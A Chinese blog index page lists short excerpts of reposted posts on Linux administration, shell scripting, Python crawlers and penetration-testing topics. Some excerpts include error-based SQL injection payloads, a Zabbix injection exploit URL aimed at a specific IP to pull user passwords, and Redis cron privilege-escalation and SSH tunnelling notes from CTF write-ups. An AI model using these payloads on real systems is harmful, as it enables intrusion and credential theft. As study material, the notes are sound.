自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

  • 博客(21)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

转载 DNS域传送漏洞

nslookup -type=ptr 8.8.8.8 #查询一个IP地址对应的域名nslookup -type=ns baidu.com #查询baidu.com使用的DNS服务器名称nslookup #进入交互式shellserver ns2.baidu.com ...

2017-01-05 18:12:00 129

转载 对一道pwnhub的一点点记录

一.通过ssh弱口令,建立socket5代理进内网。1.修改proxychains配置文件vi /etc/proxychains.conf如下:2.建立ssh隧道:ssh -qTfnN -D 7070 -p 22 user@host,能够curl本地,说明成功代理进内网。二.开放9000端口,存在fastcgi文件读取漏洞,可参考:http://www.lij...

2016-12-25 13:16:00 160

转载 redis写定时任务获取root权限

前提:1.redis由root用户启动。2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列) sudo /etc/init.d/cron start (ubuntu系列...

2016-11-18 19:52:00 375

转载 对某道ctf的一点点记录

题目:http://ctf5.shiyanbar.com/web/pcat/index.php是一道注入的题,主要利用了offset 和 group by with rollup的知识1.offset的使用和limit 0,1效果一样的,试试查一下第一条数据2.看看group by XX 与 group by XX with rollup的区别3.现在正式进入...

2016-09-24 15:20:00 115

转载 mysql手工注入步骤

1.一般用 ' " ) 等符号来闭合,再用%23(即#)来注释后面语句。2.查找数据库,先用order by n猜字段,再用union select 1,2,3 ...n%23来查询。union select 1,2,database()%233.利用information_schema库中tables这张表,查mysql数据库中的第一个表。select ta...

2016-09-11 17:37:00 118

转载 用threading和Queue模块实现多线程的端口扫描器

一.Queue模块基础q = Queue.Queue() q.qsize() 返回队列的大小 q.empty() 如果队列为空,返回True,反之False q.full()   如果队列满了,返回True,反之False q.full   与 maxsize 大小对应 q.get([block[, ...

2016-08-18 12:16:00 116

转载 linux下lz4解压缩遇到的那些事儿

一.Debian系列:Debian、Ubuntu等1.1 kali下修改apt-get源: vim /etc/apt/sources.list   deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib   deb http://mirrors.ustc.edu.cn/kali-security/ sa...

2016-08-10 20:41:00 676

转载 Shell编程之运算符和环境变量配置文件

一.shell运算符:   declare命令:   declare -i 变量名     #声明变量   eg. movie[o]=dzp     #定义数组   eg. echo ${movie[*]}   #调用数组   declare -p 变量名      #查看变量属性   数...

2016-08-03 15:42:00 92

转载 Shell编程之变量

Bash变量:用户自定义变量,环境变量,位置参数变量,预定义变量用户自定义变量: #变量赋值等号两侧不能有空格 #调用变量加$ eg. echo $x #变量的叠加:x="$x"456 或 x=${x}789 set #查看变量 set -u #echo时看变量是否存在 unset 变量名 ...

2016-08-02 10:50:00 63

转载 信息收集之zoomeye

一.浏览器上使用api接口1.https://api.zoomeye.org/user/login post传参:{"username" : "username","password" : "password"}2.返回的token,用Modify Headers修改为"Authorization: JWT <YOUR-API-TOKEN>"3.请求http://...

2016-08-01 16:51:00 1823

转载 信息收集之censys

一.摘要Censys提供了search、view、report、query、export以及data六种API接口。search接口的请求地址是https://www.censys.io/api/v1/search/?,其中?的地方可以是ipv4、websites或者certificates,分别代表搜索ipv4主机、网站和证书。我们的POST请求应该是一组包含query、pag...

2016-08-01 13:19:00 1513

转载 linux权限管理

一.基本权限 chmod 模式 文件名 #修改权限 eg.chmod u+x,g+w,o+w 文件名 eg.chmod u-x,g-w,o-w 文件名 eg.chmod u=rwx,g=ew 文件名 r---4 w---2 x---1 eg.chmod 755 文件名 ...

2016-07-26 18:51:00 61

转载 linux软件安装管理

1.软件包分类:    源码包   二进制包(RPM包,系统默认包)   脚本安装包2.安装时的一些常用命令:  rpm -ivh 包全名 #安装 rpm -Uvh 包全名 #升级 rpm -e 包名 #卸载 rpm -qa | grep 包名 #查询所装过...

2016-07-21 16:10:00 55

转载 Linux网络管理

1.linux配置ip: ifconfig命令临时配置 ifconfig eth0 192.168.254.200 netmask 255.255.255.0       setup工具永久配置 setup service network restart       修改网络配置文件    vi /etc/sysconfi...

2016-07-19 19:59:00 70

转载 磁盘管理与用户管理

一.磁盘管理1.df 查看磁盘分区使用状况 du 统计磁盘上的文件大小2.MBR分区: fdisk -l       fdisk 分区路径 #开始分区       m #查看帮助信息      主分区 扩展分区————>逻辑分区3.GPT分区:parted     select /dev/sdc       ...

2016-07-18 11:28:00 80

转载 shell基础

Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。1.常用类别:Bourne shell(sh)、C shell(csh)和Korn shell(ksh)。2.echo: echo -e #-e为特殊字符特殊处理     \t(table键) \n(换行) \x(十六进制) ...

2016-07-14 15:09:00 67

转载 关于linux的一些基础知识

一.基础1.linux所有内容以文件形式保存,包括硬件。2.linux 不区分扩展名,靠权限区分。 #但是,约定 .sh脚本文件 .conf配置文件。3.-rw-r--r-- #第一位(-文件,d目录,l软链接文件),后面每三位一组(u所有者 g所属者 o其他人),(r读 w写 x执行)。4.cd ./XXX/xxx #从当前路径...

2016-07-12 22:17:00 73

转载 关于Re模块的一些基础知识(另附一段批量抓代理ip的代码)

1.常用匹配规则. 表示任意字符[0-9] 用来匹配一个指定的字符类别[^5]表示除了5之外的其他字符,^不在字符串的开头,则表示它本身。* 对于前一个字符重复0到无穷次+ 对于前一个字符重复1到无穷次?对于前一个字符重复0到1次{m,n} 对于前一个字符重复次数在为m到n次,其中,{0,} = *,{1,} = , {0,1} = ?{m} 对于前一个字符重复m次| 表示"或"pyth...

2016-05-19 17:27:00 150

转载 从urllib和urllib2基础到一个简单抓取网页图片的小爬虫

urllib最常用的两大功能(个人理解urllib用于辅助urllib2)1.urllib.urlopen()2. urllib.urlencode() #适当的编码,可用于后面的post提交数据import urllibDict = {'name' : 'Michael Foord', 'location' : 'Northamp...

2016-05-17 23:58:00 76

转载 关于SQL注入的五大报错注入函数

~全部都以查user()为例子~1.floor()id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)2.extractvalue()id = 1 and (extractvalue(...

2016-05-14 22:38:00 1153

转载 zabbix的命令执行

1.对于低版本的可用下列exp直接打到用户http://119.29.48.232/zabbix/httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) ...

2016-05-13 18:21:00 131

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除